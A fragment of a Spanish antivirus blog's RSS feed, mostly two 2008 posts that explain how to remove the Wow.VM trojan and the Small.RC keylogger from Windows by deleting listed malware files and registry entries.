<p>Cada dos segundos se genera un virus malicioso (malware) de toda especie, desde troyanos hasta gusanos y códigos spyware. China es la nación que más genera virus en el mundo, con alrededor de 100 mil virus por día, muchos de los cuales violan la seguridad de los antivirus.</p>
<h3  class="related_post_title">Posts relacionados</h3><ul class="related_post"><li><a href="http://www.protegeme.es/antivirus/virus-a-tua-foto" title="Virus &#8216;A tua foto&#8217;">Virus &#8216;A tua foto&#8217;</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/listado-de-programas-antivirus-reales" title="Listado de programas antivirus reales">Listado de programas antivirus reales</a> (1)</li><li><a href="http://www.protegeme.es/antivirus/koobface-c" title="Virus Koobface.C">Virus Koobface.C</a> (1)</li><li><a href="http://www.protegeme.es/antivirus/kaspersky-2010" title="Kaspersky Internet Security 2010 y Kaspersky Antivirus 2010">Kaspersky Internet Security 2010 y Kaspersky Antivirus 2010</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/osiatis-kaspersky" title="Osiatis y Kaspersky, unidos bajo la seguridad">Osiatis y Kaspersky, unidos bajo la seguridad</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/kaspersky-mobile-security-80" title="Kaspersky Mobile Security 8.0">Kaspersky Mobile Security 8.0</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/kaspersky-anti-virus-windows7" title="Descarga Kaspersky Anti-virus para el Windows7">Descarga Kaspersky Anti-virus para el Windows7</a> (1)</li><li><a href="http://www.protegeme.es/antivirus/hackear-facebook" title="Hackear facebook, un negocio muy rentable">Hackear facebook, un negocio muy rentable</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/kaspersky-hosted-security-services" title="Kaspersky Hosted Security Services">Kaspersky Hosted Security Services</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/que-es-alertvir" title="Que es Alertvir">Que es Alertvir</a> (0)</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.protegeme.es/antivirus/ataques-a-redes-sociales/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Troyano Wow.VM o Trojan.W32: Como eliminarlo</title>
		<link>http://www.protegeme.es/antivirus/wow-vm-love-jpg</link>
		<comments>http://www.protegeme.es/antivirus/wow-vm-love-jpg#comments</comments>
		<pubDate>Tue, 18 Nov 2008 22:05:05 +0000</pubDate>
		<dc:creator>AntiVirus</dc:creator>
				<category><![CDATA[Troyano]]></category>
		<category><![CDATA[Casinos online]]></category>
		<category><![CDATA[Peligrosidad: 1]]></category>
		<category><![CDATA[Windows 2000]]></category>
		<category><![CDATA[Windows 2003]]></category>
		<category><![CDATA[Windows 2008]]></category>
		<category><![CDATA[Windows Vista]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.protegeme.es/?p=58</guid>
		<description><![CDATA[Instrucciones para eliminar el troyano Trojan.W32 o Wow.VM, aprovecha la llegada de un fichero denominado "love.jpg" para robar las credenciales de acceso a ciertos juegos online. Ejecutado tras la llegada de la foto de una chica con rasgos orientales que tapa la ejecución del código malicioso.]]></description>
			<content:encoded><![CDATA[<p>Este troyano, que aprovecha la llegada de un fichero denominado &#8220;<strong>love.jpg</strong>&#8221; para robar las credenciales de acceso a ciertos juegos online. Es ejecutado tras la llegada de la foto de una chica con rasgos orientales que tapa la ejecución del código malicioso. En caso de que no pueda realizar una restauración del sistema o no funcione el punto de restauracion, para <strong>eliminar el troyano</strong> ha de realizar lo siguiente:</p>
<ul>
<li>Reinicie el ordenador en <em>Modo Seguro</em>, en modo <em>A prueba de fallos</em>.</li>
<li>Pase su Antivirus (en caso de no tener ningun <a title="Antivirus" href="http://www.mysecuritycenter.com/mymsc2">antivirus</a>, no dude en descargar la siguiente versión de prueba de <strong>MySecurity Center</strong>)</li>
<li>Elimine los siguientes ficheros
<ul>
<li> C:\1.HIV</li>
<li> C:\2.HIV</li>
<li> <em>%UserProfile%</em>\Documentos recientes\LOVE.JPG.LNK <em>(UserProfile es el directorio de trabajo del usuario actual)</em></li>
<li> <em>%UserProfile%</em>\Documentos recientes\SYSTEM32.LNK <em>(UserProfile es el directorio de trabajo del usuario actual)</em></li>
<li> <em>%System%</em>\2.BAT <em>(System es el directorio del sistema de Windows)</em></li>
<li> <em>%Windir%</em>\help\B41346EFA848.EXE <em>(Windir es el directorio de instalación de Windows)</em></li>
<li> <em>%Windir%</em>\help\B41346EFA848.DLL <em>(Windir es el directorio de instalación de Windows)</em></li>
</ul>
</li>
<li>Editar el registro de windows:
<ul>
<li> Eliminar la clave del registro:
<pre>HKEY_CLASSES_ROOT\ CLSID\ {1DBD6574-D6D0-4782-94C3-69619E719765}</pre>
</li>
</ul>
</li>
<li>Eliminar los archivos temporales del ordenador.</li>
<li>Vaciar la papelera de reciclaje.</li>
</ul>
<h3>Resumen del Troyano Wow.VM</h3>
<p><strong>Nombre completo:</strong> Trojan.W32/Wow.VM</p>
<p><strong>Tipo:</strong> Troyano. No se propaga solo.</p>
<p><strong>Plataforma:</strong> W32 &#8211; Ejecutable (.EXE, .SCR, .DLL) que corre en Windows de 32 bits</p>
<p><strong>Alias</strong>: Trj/Wow.VM (Panda Security)</p>
<h3  class="related_post_title">Posts relacionados</h3><ul class="related_post"><li><a href="http://www.protegeme.es/antivirus/exploit-tr" title="Eliminar Exploit.TR, quitar Exploit.TR">Eliminar Exploit.TR, quitar Exploit.TR</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/peerfrag-fm" title="Peerfrag.FM">Peerfrag.FM</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/personal-antivirus" title="Personal Antivirus">Personal Antivirus</a> (19)</li><li><a href="http://www.protegeme.es/antivirus/win32-gimmiv-a" title="Win32/Gimmiv.A">Win32/Gimmiv.A</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/gusano-conficker-a" title="Gusano Conficker.A">Gusano Conficker.A</a> (24)</li><li><a href="http://www.protegeme.es/antivirus/eliminar-redlofs-quitar-el-gusano-redlofs" title="Eliminar Redlofs, Quitar el gusano Redlofs">Eliminar Redlofs, Quitar el gusano Redlofs</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/hacer-windows-vista-mas-seguro" title="Como hacer el Windows Vista mas seguro en 10 pasos">Como hacer el Windows Vista mas seguro en 10 pasos</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/troyano-smallrc" title="Troyano Small.RC">Troyano Small.RC</a> (0)</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.protegeme.es/antivirus/wow-vm-love-jpg/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Troyano Small.RC</title>
		<link>http://www.protegeme.es/antivirus/troyano-smallrc</link>
		<comments>http://www.protegeme.es/antivirus/troyano-smallrc#comments</comments>
		<pubDate>Mon, 17 Nov 2008 23:48:47 +0000</pubDate>
		<dc:creator>AntiVirus</dc:creator>
				<category><![CDATA[Troyano]]></category>
		<category><![CDATA[Captura pulsaciones de teclado]]></category>
		<category><![CDATA[Peligrosidad: 1]]></category>

		<guid isPermaLink="false">http://www.protegeme.es/?p=46</guid>
		<description><![CDATA[Este troyano Small.RC captura las pulsaciones del teclado en el sistema comprometido, en el ordenador del atacado. Siga los siguientes pasos para eliminar el troyano Small.RC. Nombre completo: Keylogger.W32/Small.RC Tipo: Keylogger. Alias:TrojanDropper.Small.rc (Quick Heal)]]></description>
			<content:encoded><![CDATA[<p>Este <strong>troyano captura las pulsaciones del teclado</strong> en el sistema comprometido, en el ordenador del atacado. En caso de que no pueda realizar una restauración del sistema o no funcione el punto de restauracion, para eliminar el troyano ha de realizar lo siguiente:</p>
<ul>
<li>Reinicie el ordenador en <em>Modo Seguro</em>, en modo <em>A prueba de fallos</em>.</li>
<li>Pase su Antivirus (en caso de no tener ningun <a title="Antivirus" href="http://www.mysecuritycenter.com/mymsc2">antivirus</a>, no dude en descargar la siguiente versión de prueba de MySecurity Center)</li>
<li>Elimine los siguientes ficheros
<ul>
<li>%System%\lncom.exe<em> (System es el directorio del sistema de Windows)</em></li>
<li>%System%\lncom_.exe<em> (System es el directorio del sistema de Windows)</em></li>
<li>%System%\winkey.dll <em> (System es el directorio del sistema de Windows)</em></li>
<li>%System%\reginv.dll<em> (System es el directorio del sistema de Windows)</em></li>
<li>%System%\fservice.exe  <em>(System es el directorio del sistema de Windows)</em></li>
<li>%Windir%\ktd32.atm <em>(Windir es el directorio de instalación de Windows)</em></li>
<li>%Windir%\services.exe<em> (Windir es el directorio de instalación de Windows)</em></li>
<li>%Windir%\system\sservice.exe <em>(Windir es el directorio de instalación de Windows)<br />
</em></li>
</ul>
</li>
<li>Editar el registro de windows:
<ul>
<li> Eliminar:
<pre>HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
DirectX For Windows = "%System%\fservice.exe"</pre>
</li>
<li> Cambiar el registro siguiente que aparezca con:
<pre>HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell = Explorer.exe</pre>
</li>
</ul>
</li>
<li>Eliminar los archivos temporales del ordenador.</li>
<li>Vaciar la papelera de reciclaje.</li>
</ul>
<h3>Resumen de Small.RC</h3>
<p><strong>Nombre completo:</strong> Keylogger.W32/Small.RC    <strong></strong></p>
<p><strong>Tipo:</strong> Keylogger.</p>
<p><strong>Plataforma:</strong> [W32] &#8211; Ejecutable PE (.EXE, .SCR, .DLL) que corre en Windows de 32 bits: 95, 98, Me, NT, 2000, XP, 2003</p>
<p><strong>Alias</strong>:TrojanDropper.Small.rc (Quick Heal)</p>
<h3  class="related_post_title">Posts relacionados</h3><ul class="related_post"><li><a href="http://www.protegeme.es/antivirus/descargar-gratis-antikeylogger-keyscrambler" title="Descargar Anti-keylogger KeyScrambler Gratis">Descargar Anti-keylogger KeyScrambler Gratis</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/hackear-facebook" title="Hackear facebook, un negocio muy rentable">Hackear facebook, un negocio muy rentable</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/eliminar-redlofs-quitar-el-gusano-redlofs" title="Eliminar Redlofs, Quitar el gusano Redlofs">Eliminar Redlofs, Quitar el gusano Redlofs</a> (0)</li><li><a href="http://www.protegeme.es/antivirus/wow-vm-love-jpg" title="Troyano Wow.VM o Trojan.W32: Como eliminarlo">Troyano Wow.VM o Trojan.W32: Como eliminarlo</a> (1)</li><li><a href="http://www.protegeme.es/antivirus/exploit-tr" title="Eliminar Exploit.TR, quitar Exploit.TR">Eliminar Exploit.TR, quitar Exploit.TR</a> (0)</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.protegeme.es/antivirus/troyano-smallrc/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

